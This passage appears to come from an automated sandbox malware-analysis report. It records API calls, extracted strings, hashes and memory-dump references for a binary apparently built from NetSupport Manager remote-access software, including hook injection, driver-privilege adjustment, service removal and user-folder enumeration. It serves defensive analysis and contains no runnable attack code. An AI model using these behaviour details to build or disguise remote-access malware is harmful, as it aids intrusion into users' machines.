                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 10892065-0
                                                                                          APIs
                                                                                            • Part of subcall function 005EC921: GetModuleHandleW.KERNEL32(mscoree.dll,?,005EC959,?,?,005F925A,000000FF,0000001E,006336B0,0000000C,005F9305,?,?,?,005F2AA8,0000000D), ref: 005EC92B
                                                                                            • Part of subcall function 005EC921: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005EC93B
                                                                                          • ExitProcess.KERNEL32 ref: 005EC95D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressExitHandleModuleProcProcess
                                                                                          • String ID:
                                                                                          • API String ID: 75539706-0
                                                                                          APIs
                                                                                          • FreeLibrary.KERNELBASE(772F0000), ref: 0061830A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID:
                                                                                          • API String ID: 3664257935-0
                                                                                          APIs
                                                                                          • GetClassNameW.USER32(?,?,00000080), ref: 005E0411
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • GetModuleHandleW.KERNEL32(user32.dll,GetWindowBand), ref: 005E0437
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005E043E
                                                                                          • SHGetFolderPathW.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 005E049B
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005E0547
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005E0560
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 005E059B
                                                                                          • GetProcAddress.KERNEL32(?,MySetHook), ref: 005E05CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadModuleNameProcwsprintf$ClassFileFolderHandleLocalPathTimewvsprintf
                                                                                          • String ID: Found SM, SimulateWinKey (to dismiss)$GetWindowBand$HookForBlank(%x, %s, %x)$Injecting...$Loaded %s$MySetHook$MyUnhook$NSMBlank_%p$NSMViewPaused$Shell_TrayWnd$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s$WaitSM$\NSL\$band=2$bound$nothing to do$user32.dll$winsthooks.dll
                                                                                          • API String ID: 1466273555-315793285
                                                                                          • Opcode ID: d950bcf28b3211c4b52656db61afe57d4e2687017c0da3324c41df870e3c5753
                                                                                          • Instruction ID: e7a5a754cd7843564ab34e678befdfee4a7b0627ab99b89681bcadeb5bca8b4f
                                                                                          • Opcode Fuzzy Hash: d950bcf28b3211c4b52656db61afe57d4e2687017c0da3324c41df870e3c5753
                                                                                          • Instruction Fuzzy Hash: C61239B1D003699BDB349B65DC49BEA7B79BF40704F085095E64AA71C2EBB09DC0CF61
                                                                                          APIs
                                                                                          • GetVersionExW.KERNEL32(?), ref: 005CA8D5
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 005CA900
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005CA909
                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetProductInfo,Microsoft ), ref: 005CAA1F
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005CAA22
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleModuleProc$Version
                                                                                          • String ID: (build %d)$, 32-bit$, 64-bit$Advanced Server$Business Edition$Cluster Server Edition$Compute Cluster Edition$Datacenter Edition$Datacenter Edition (core installation)$Datacenter Edition for Itanium-based Systems$Datacenter Server$Datacenter x64 Edition$Enterprise Edition$Enterprise Edition (core installation)$Enterprise Edition for Itanium-based Systems$Enterprise x64 Edition$GetNativeSystemInfo$GetProductInfo$Home Basic Edition$Home Edition$Home Premium Edition$Microsoft $Professional$Server$Small Business Server$Small Business Server Premium Edition$Standard Edition$Standard Edition (core installation)$Standard x64 Edition$Starter Edition$Ultimate Edition$Web Edition$Web Server Edition$Windows 10 $Windows 2000 $Windows 7 $Windows 8 $Windows 8.1 $Windows Home Server$Windows Server 2003 R2, $Windows Server 2003, $Windows Server 2008 $Windows Server 2008 R2 $Windows Server 2012 $Windows Server 2012 R2 $Windows Server 2016 $Windows Storage Server 2003$Windows Vista $Windows XP $Windows XP Professional x64 Edition$kernel32.dll
                                                                                          • API String ID: 1459689528-3593436524
                                                                                          • Opcode ID: d015dbc739a54bd540d9ab1afc18e28e4f90abb11c70a1db2f903551f50d18ff
                                                                                          • Instruction ID: c39e49a319b53748fd9480b8612d649016afb84ab5a806155bcd23048338f45e
                                                                                          • Opcode Fuzzy Hash: d015dbc739a54bd540d9ab1afc18e28e4f90abb11c70a1db2f903551f50d18ff
                                                                                          • Instruction Fuzzy Hash: 00C1E630B4876CAEDF3086909E06FF97E62BB51B0CF15449EE44A66182CAB45DC1DF53
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000000,00000000,00000000,?,005B0BEF,?,005B9820,?,00000000,?,005B0C46,?,005B9820,?,00000000), ref: 005B015C
                                                                                          • GetTickCount.KERNEL32 ref: 005B01D9
                                                                                          • GetTickCount.KERNEL32 ref: 005B0204
                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 005B0228
                                                                                          • TranslateMessage.USER32(?), ref: 005B0231
                                                                                          • DispatchMessageW.USER32(?), ref: 005B023A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B0267
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B026A
                                                                                          • wsprintfW.USER32 ref: 005B027F
                                                                                          • wsprintfW.USER32 ref: 005B02AE
                                                                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B02CF
                                                                                          • GetProcessTimes.KERNEL32(00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B02D6
                                                                                          • GetSystemTimeAsFileTime.KERNEL32(?,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B02EB
                                                                                          • wsprintfW.USER32 ref: 005B0395
                                                                                          • GetCurrentProcess.KERNEL32(00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0430
                                                                                          • GetGuiResources.USER32(00000000,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B0437
                                                                                          • wsprintfW.USER32 ref: 005B046D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B0494
                                                                                          • wsprintfW.USER32 ref: 005B04A3
                                                                                          • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,?,?,005B9820,?,..\CTL32\Refcount.cpp,00000546), ref: 005B04AF
                                                                                          • wsprintfW.USER32 ref: 005B04F7
                                                                                          • wsprintfW.USER32 ref: 005B0553
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,005B9820,?,..\CTL32\Refcount.cpp), ref: 005B0566
                                                                                          • wsprintfW.USER32 ref: 005B0602
                                                                                          Similarity
                                                                                          • API ID: wsprintf$Current$MessageProcessThread$CountFileTickTime$DebugDispatchErrorLastModuleNameOutputResourcesStringSystemTimesTranslate
                                                                                          • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$ $%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$%d.$%ud %02uh %02um %02us$, error code %u (x%x)$, gdiHandles=%d$, runTime=$, thread=%s$, tid=%u (x%x)$.err$.exe$00h$00m$05/12/23 12:20:03 V14.10$Assert, tid=%x thread=%s exp=%s @ %hs:%d$File %hs, line %d%s%sBuild: %hs (%.17hs)Expression: %s$NOT copied to disk$Support\$copied to %s
                                                                                          • API String ID: 1606059176-3631277593
                                                                                          • Opcode ID: 1d0a455b27290b07e7e6bae2994e7f5ffe0958179c3965530c17daf70ac6bdfd
                                                                                          • Instruction ID: f9f6584ba23e67f1da3d3acbf868fe488a85bf64294c2ea4c255e4b05e138f07
                                                                                          • Opcode Fuzzy Hash: 1d0a455b27290b07e7e6bae2994e7f5ffe0958179c3965530c17daf70ac6bdfd
                                                                                          • Instruction Fuzzy Hash: E15219719002159BCF24DF64CD55BEB77BAFF84700F089595EA0AA72D0EB71AE84CB90
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,DE64E134), ref: 005D80FA
                                                                                          • GetLastError.KERNEL32 ref: 005D810C
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F01FF), ref: 005D8134
                                                                                          • GetLastError.KERNEL32 ref: 005D8146
                                                                                          • OpenServiceW.ADVAPI32(?,PCISys,000F0003), ref: 005D85BE
                                                                                          • GetLastError.KERNEL32 ref: 005D85CA
                                                                                          • CloseServiceHandle.ADVAPI32(?), ref: 005D868E
                                                                                          • OpenSCManagerW.ADVAPI32(?,?,000F003F), ref: 005D86F5
                                                                                          • GetLastError.KERNEL32 ref: 005D876A
                                                                                          Similarity
                                                                                          • API ID: ErrorLastOpen$Service$Manager$CloseHandleLoadStringwvsprintf
                                                                                          • String ID: /u /ex$Attempting to restart audio$Deleting %s$ImagePath$IsA()$PCISys$Remove Audio ret %d, e=%d$Remove nskbfltr ret %d$Removing nskblftr$SYSTEM\CurrentControlSet\Services\%s$\inv$\inv\$\inv\*.bin$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h$nskbfltr$restart audio ret %d
                                                                                          • API String ID: 3309688422-3552944703
                                                                                          • Opcode ID: 392ebc8df5e523ca6f908d961744b4cf3ce8469388033b0f7fda86890b5428f5
                                                                                          • Instruction ID: 56a4e250f38256cb4dd5c1965df4e8421fef6b558d069577e5f01ae4039248de
                                                                                          • Opcode Fuzzy Hash: 392ebc8df5e523ca6f908d961744b4cf3ce8469388033b0f7fda86890b5428f5
                                                                                          • Instruction Fuzzy Hash: E502F27090021A9BDB30EB68DC59BFA7B75FF94704F044197E809A3392EB705A85CF61
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32(0063C2E0), ref: 005D10B6
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES_300.DLL,00000000,00000002,NSMRES_300.DLL,NSMRES_300.DLL,NSMRES_300.DLL,NSMRES_300.DLL), ref: 005D11B4
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES_250.DLL,00000000,00000002,NSMRES_250.DLL,NSMRES_250.DLL,NSMRES_250.DLL), ref: 005D1296
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES_200.DLL,00000000,00000002,NSMRES_200.DLL,NSMRES_200.DLL,NSMRES_200.DLL), ref: 005D1378
                                                                                          • LoadLibraryExW.KERNEL32(NSSRESDM_150.DLL,00000000,00000002,NSSRESDM_150.DLL,NSSRESDM_150.DLL,NSSRESDM_150.DLL), ref: 005D1478
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES_125.DLL,00000000,00000002,NSMRES_125.DLL,NSMRES_125.DLL,NSMRES_125.DLL), ref: 005D1557
                                                                                          • LoadLibraryExW.KERNEL32(NSMRES.DLL,00000000,00000002,NSMRES.DLL,NSMRES.DLL,NSMRES.DLL,NSMRES.DLL), ref: 005D1656
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$IncrementInterlocked
                                                                                          • String ID: ..\CTL32\util.cpp$NSMRES.DLL$NSMRESDM_150.DLL$NSMRES_125.DLL$NSMRES_150.DLL$NSMRES_200.DLL$NSMRES_250.DLL$NSMRES_300.DLL$NSSRES.DLL$NSSRESDM_150.DLL$NSSRES_125.DLL$NSSRES_150.DLL$NSSRES_200.DLL$NSSRES_250.DLL$NSSRES_300.DLL$dpi != -1$x
                                                                                          • API String ID: 4104599539-1743827446
                                                                                          • Opcode ID: 383ed7d88d9399ef20fa2eaa27a45c18e963b407586202d06b55432e26e2ae2e
                                                                                          • Instruction ID: 1261571db527f3a68d75910ef16a2c96d18f170a50b225aaf1429f0d3d831f16
                                                                                          • Opcode Fuzzy Hash: 383ed7d88d9399ef20fa2eaa27a45c18e963b407586202d06b55432e26e2ae2e
                                                                                          • Instruction Fuzzy Hash: 5E02D6B2D0050AABCB20DFECD859ADEBFB5FF49314F14812AE515AB390D7309A44CB95
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,?,00000001), ref: 005C0D4E
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 005C0DF9
                                                                                          • FindClose.KERNEL32(00000000), ref: 005C0E08
                                                                                          • FindFirstFileW.KERNEL32(c:\users\*.*,?), ref: 005C0E38
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 005C0F04
                                                                                          Similarity
                                                                                          • API ID: Find$File$First$CloseNext
                                                                                          • String ID: IsA()$c:\users\%s\AppData\Local\VirtualStore\%s$c:\users\%s\AppData\Roaming\%s$c:\users\*.*$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h$sysinfo.scp
                                                                                          • API String ID: 2001080981-3491454298
                                                                                          • Opcode ID: 8d655fd0953141a71355176e61b96dac3293b8368761e6d5dff4ffe6e5e2f4b0
                                                                                          • Instruction ID: aae9068167325d4cb9610c4942818049f1e1da54747c6de516a0b15226f8e128
                                                                                          • Opcode Fuzzy Hash: 8d655fd0953141a71355176e61b96dac3293b8368761e6d5dff4ffe6e5e2f4b0
                                                                                          • Instruction Fuzzy Hash: 66D190759002199FCB20DB94CC59FEAB77ABF94310F0486D9E909A3281DB716F95CF60
                                                                                          APIs
                                                                                          • lstrcmpiW.KERNEL32(?,00624BF8), ref: 005DCDEF
                                                                                            • Part of subcall function 005DB310: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 005DB389
                                                                                            • Part of subcall function 005DB310: GetLastError.KERNEL32 ref: 005DB39B
                                                                                          Similarity
                                                                                          • API ID: ErrorLastManagerOpenlstrcmpi
                                                                                          • String ID: (null)$Application\PCIapp$C:\Windows\Installer\$Do Install (%d), params=<%s>$Done Install$PCIAX.DLL$Software\Microsoft\Windows\CurrentVersion\Uninstall\ProxyHost$System\PCIsys$gdihook4$iRemovedTS=%d$localmon$pcimon$Kb
                                                                                          • API String ID: 1860037224-3372856316
                                                                                          • Opcode ID: 7e0733d9ec3e711eebc707afece31b21f23ad35b4e4220fa75508097d1b64746
                                                                                          • Instruction ID: 1cdc0591f8d4c81e5c6765baff0036bcc67f97fe324321c2020173fb2baa5677
                                                                                          • Opcode Fuzzy Hash: 7e0733d9ec3e711eebc707afece31b21f23ad35b4e4220fa75508097d1b64746
                                                                                          • Instruction Fuzzy Hash: 4FC1FAB5D003179AEB30676C9D1A7A63E66FF50704F054077FD0997392EAB09D84C6E2
                                                                                          APIs
                                                                                          • GetSystemDirectoryW.KERNEL32(?,000000F6), ref: 005D4B11
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 005D4B6E
                                                                                          • FindClose.KERNEL32(00000000), ref: 005D4B80
                                                                                          • GetModuleFileNameW.KERNEL32(00590000,?,000000F6), ref: 005D4B95
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 005D4BDD
                                                                                          • FindClose.KERNEL32(00000000), ref: 005D4BE9
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005D4C71
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmp
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileFind$CloseFirst$CopyDirectoryModuleNameSystem
                                                                                          • String ID: localmon$localmon.dll$pcimon$pcimon.dll
                                                                                          • API String ID: 958704277-202963052
                                                                                          • Opcode ID: dc4fb9e1879028eae9a35dfbc2474ca11c82603284971687b0453848a2cf30ce
                                                                                          • Instruction ID: ca792c8c4904c6a2ecdaa2560fd677d074702e9dfc45db60d847f84fee3f801f
                                                                                          • Opcode Fuzzy Hash: dc4fb9e1879028eae9a35dfbc2474ca11c82603284971687b0453848a2cf30ce
                                                                                          • Instruction Fuzzy Hash: 624146759112169BCB34DB68CC6ABBA7776BF80304F14829BE509672D1EB309E45CFA0
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 005D2303
                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 005D230A
                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeLoadDriverPrivilege,?), ref: 005D2321
                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 005D234D
                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 005D236D
                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 005D239A
                                                                                          • LookupPrivilegeNameW.ADVAPI32(00000000,00000004,?,?), ref: 005D23DC
                                                                                          • CloseHandle.KERNEL32(?), ref: 005D241F
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Token$InformationLookupPrivilegeProcess$AdjustCloseCurrentHandleNameOpenPrivilegesValue
                                                                                          • String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s$SeLoadDriverPrivilege
                                                                                          • API String ID: 171400580-2784006985
                                                                                          • Opcode ID: 337191eb833c322897fc93674df039ddb9b9108ec7c7e38f055bb2ac4a146897
                                                                                          • Instruction ID: fc9e6a5bf562d1d415e101c9e7a2bd0f679f4a176f40a02edb985910fa72a67e
                                                                                          • Opcode Fuzzy Hash: 337191eb833c322897fc93674df039ddb9b9108ec7c7e38f055bb2ac4a146897
                                                                                          • Instruction Fuzzy Hash: B7416F71900229AFDB20CB65CC49FEABB79FF89700F04809AB90D92241DB745E85CFA1
                                                                                          APIs
                                                                                          • GetWindowRect.USER32(?,?), ref: 005D44E1
                                                                                          • IsIconic.USER32(?), ref: 005D44EE
                                                                                          • GetClientRect.USER32(?,?), ref: 005D44FD
                                                                                          • GetSystemMetrics.USER32(00000000), ref: 005D4512
                                                                                          • GetSystemMetrics.USER32(00000001), ref: 005D4519
                                                                                          • IsIconic.USER32(?), ref: 005D4543
                                                                                          • GetWindowRect.USER32(?,?), ref: 005D4552
                                                                                          • GetSystemMetrics.USER32(00000000), ref: 005D4578
                                                                                          • GetSystemMetrics.USER32(00000010), ref: 005D4588
                                                                                          • GetSystemMetrics.USER32(00000001), ref: 005D4594
                                                                                          • GetSystemMetrics.USER32(00000011), ref: 005D45A4
                                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 005D45BC
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$RectWindow$Iconic$Client
                                                                                          • String ID:
                                                                                          • API String ID: 2775841378-0
                                                                                          • Opcode ID: 85f15c9e507bb4150044ca0b1acb9cc60c2808a4f467fe620fe6b0e3c9031bd3
                                                                                          • Instruction ID: f06b1139f7d44cdf73f63562f095d369105542ac7a84ec5f4a6a20af68caebc6
                                                                                          • Opcode Fuzzy Hash: 85f15c9e507bb4150044ca0b1acb9cc60c2808a4f467fe620fe6b0e3c9031bd3
                                                                                          • Instruction Fuzzy Hash: 26410B32E001199FCB10DFADDD89AEEBBF6BF88700F55415AE505B7254DB70AE018BA4
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 005CA71E
                                                                                          • LoadLibraryW.KERNEL32(Advapi32.dll), ref: 005CA730
                                                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 005CA762
                                                                                          • FreeSid.ADVAPI32(?), ref: 005CA782
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 005CA78D
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005CA7B4
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary$AddressAllocateErrorInitializeLastLoadOpenProcVersion
                                                                                          • String ID: Advapi32.dll$CheckTokenMembership
                                                                                          • API String ID: 3620134906-3257277533
                                                                                          • Opcode ID: ec55e88f833a5ddd6b30c038562bb162fa8ab04f92b88c4742a067fed0a26204
                                                                                          • Instruction ID: 87ac94cfe57d7ff672f731d3a7b7a43771f13e96b54b764cce6dc7946011d21f
                                                                                          • Opcode Fuzzy Hash: ec55e88f833a5ddd6b30c038562bb162fa8ab04f92b88c4742a067fed0a26204
                                                                                          • Instruction Fuzzy Hash: 1D3127B1D40219AFCB10DFEAD8C9AEEFBB9FB48714F54442EE515A3240D73459008BA1
                                                                                          APIs
                                                                                          • FindResourceW.KERNEL32(?,?,00000002), ref: 005B8FC2
                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 005B8FCF
                                                                                          • LockResource.KERNEL32(00000000), ref: 005B8FD8
                                                                                          • GetDC.USER32(00000000), ref: 005B8FE2
                                                                                          • SelectPalette.GDI32(00000000,?,00000000), ref: 005B900E
                                                                                          • RealizePalette.GDI32(00000000), ref: 005B9015
                                                                                          • CreateDIBitmap.GDI32(00000000,00000000,00000004,?,00000000,00000000), ref: 005B902C
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005B9037
                                                                                          • DeleteObject.GDI32(00000000), ref: 005B903E
                                                                                          Similarity
                                                                                          • API ID: Resource$Palette$BitmapCreateDeleteFindLoadLockObjectRealizeReleaseSelect
                                                                                          • String ID:
                                                                                          • API String ID: 3264011865-0
                                                                                          • Opcode ID: 6e13009f906f528fb77515cc457d063d345063bd900c30c2ce3b8fd6ea6dbb7e
                                                                                          • Instruction ID: c179623ed2b04b48acc3e653341d597129efea04e17e59667dd3a643b19f1d6b
                                                                                          • Opcode Fuzzy Hash: 6e13009f906f528fb77515cc457d063d345063bd900c30c2ce3b8fd6ea6dbb7e
                                                                                          • Instruction Fuzzy Hash: 47116A71600215BBD7106FB59C5DBFB7BBDEF8AB11F14801AFA05D6250DA749D0087B0
                                                                                          APIs
                                                                                          • OpenClipboard.USER32(?), ref: 005C6A37
                                                                                          • GlobalAlloc.KERNEL32(00002002,?), ref: 005C6A69
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 005C6A72
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 005C6A84
                                                                                          • EmptyClipboard.USER32 ref: 005C6A8A
                                                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 005C6A93
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 005C6A9E
                                                                                          • MessageBeep.USER32(00000030), ref: 005C6AA6
                                                                                          • CloseClipboard.USER32 ref: 005C6AAC
                                                                                          Similarity
                                                                                          • API ID: ClipboardGlobal$AllocBeepCloseDataEmptyFreeLockMessageOpenUnlock
                                                                                          • String ID:
                                                                                          • API String ID: 2291271916-0
                                                                                          • Opcode ID: ae715b82e88beca1ac90003709153864c37cdb154d277343569abbcc47448b08
                                                                                          • Instruction ID: cb734e313170be9327885c5b05193460c1133d92a1e6abe653919e64f03f598c
                                                                                          • Opcode Fuzzy Hash: ae715b82e88beca1ac90003709153864c37cdb154d277343569abbcc47448b08
                                                                                          • Instruction Fuzzy Hash: F2019236200204AFDB106FA5EC5DEDB3B6EEF8A745B089026FA09D7161D6709A01CBB1
                                                                                          APIs
                                                                                          • GetUserDefaultLCID.KERNEL32(00000083,00000000,000000BC,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602D84
                                                                                          • IsValidCodePage.KERNEL32(00000000,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602DD6
                                                                                          • IsValidLocale.KERNEL32(?,00000001,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602DE9
                                                                                          • GetLocaleInfoA.KERNEL32(?,00001001,?,00000040,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602E53
                                                                                          • GetLocaleInfoA.KERNEL32(?,00001002,00000014,00000040,?,005F3632,?,000000BC,?,00000001,00000000,00000000), ref: 00602E67
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: Locale$InfoValid$CodeDefaultPageUser
